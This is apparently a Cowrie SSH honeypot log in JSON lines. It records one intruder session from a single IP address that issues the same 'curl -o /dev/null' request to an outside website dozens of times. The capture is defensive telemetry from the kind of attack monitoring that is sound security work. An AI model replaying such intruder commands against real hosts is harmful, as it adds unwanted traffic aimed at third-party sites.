{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.279072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.316747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.317923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.356104Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.357268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.398236Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.399741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.440222Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.441366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.477929Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.479090Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.516484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.517642Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.556421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.557638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.600662Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.601949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.640654Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.641866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.713744Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.715002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.752592Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.754071Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.793158Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.794371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.831735Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.832944Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.872932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.874436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.913319Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.914782Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.955294Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.956487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.000766Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.002150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.040301Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.041450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.086225Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.087461Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.124657Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.125904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.165375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.166533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.220858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.221976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.347320Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.348331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.386538Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.387911Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.431017Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.432155Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.469217Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.470433Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.521735Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.522967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.650548Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.651988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.693799Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.694956Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.732930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.734375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.780082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.781518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.830767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.831615Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.952848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.954047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:25.993384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:25.994643Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.129374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.130618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.170081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.171174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.213387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.214432Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.250871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.251837Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.288771Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.289915Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.409155Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.410109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.524392Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.525629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.563880Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.565310Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.604360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.605485Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.648177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.649391Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.687253Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.688487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.729436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.730374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.883029Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.884028Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.920525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.921838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.959460Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.960488Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:26.997296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:26.998764Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.037494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.038647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.080818Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.082026Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.123684Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.124715Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.163003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.164136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.203514Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.204928Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.243840Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.244937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.288303Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.289443Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.329801Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.330734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.374058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.375132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.414308Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.415377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.454616Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.455629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.496255Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.497453Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.537132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.538093Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.578857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.579636Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
